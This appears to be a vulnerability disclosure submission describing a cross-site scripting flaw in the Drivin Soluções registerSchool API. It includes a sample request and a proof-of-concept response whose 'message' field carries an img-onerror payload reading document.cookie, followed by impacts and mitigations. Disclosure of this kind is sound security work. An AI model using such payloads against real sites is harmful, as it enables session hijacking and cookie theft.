Submission #509834: Drivin Drivin Soluções NA Cross-Site Scripting via API Response Manipulation

Title: Drivin Drivin Soluções NA Cross-Site Scripting via API Response Manipulation
Description:

Vendor: Drivin
Product: Drivin Soluções

A Cross-Site Scripting (XSS) vulnerability was identified in the Drivin Soluções platform. The issue arises from improper handling of API responses, where user-controlled input is reflected directly in the front-end without proper sanitization.

Request:

POST /api/school/registerSchool HTTP/2
Host: X.X.X.X
Content-Type: application/json

{"name":"bilubiluteteia","code":"123","cnpj":"12.321.321/3213-21","email":"[email protected]","phone":"(12) 3 1231-2312","zipCode":"18053-362","city":"Sorocaba","street":"Rua Almir Muza Soares","district":"Jardim Santa Bárbara","number":"123123","complement":"","state":"SP"}

Response:

HTTP/2 400 Bad Request
Content-Type: application/json

{"message":"Escola ja cadastrada!","error":"Escola ja cadastrada!","statusCode":400}

POC
----------------

By intercepting the API response and modifying the `message` field, an attacker can inject JavaScript that will execute on the client-side when processed by the front-end.

Malicious Request:

HTTP/2 400 Bad Request
Content-Type: application/json

{"message":"<img src onerror=alert(document.cookie)>","error":"Escola ja cadastrada!","statusCode":400}

When this response is rendered on the webpage, the JavaScript within the `message` field executes, leading to an XSS attack.

Impact:
- Theft of authentication cookies and session hijacking.
- Potential redirection to malicious websites.
- Defacement or unauthorized actions performed on behalf of the victim.

Mitigation:
- Implement proper output encoding before displaying any user-supplied data.
- Use Content Security Policy (CSP) to restrict script execution.
- Sanitize API responses before rendering them in the front-end.

Classification:
- Type: Reflected XSS via API Response Manipulation
- CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Source: https://github.com/yago3008/cves
User: y4g0 (UID 80480)
Submitted: 2025. 02. 26. PM 07:52 (1 year ago)
Moderation: 2025. 03. 15. AM 10:27 (17 days later)
Status: Accepted
VulDB Entry: 299800 [Drivin Soluções up to 20250226 API registerSchool message cross site scripting]
Points: 20
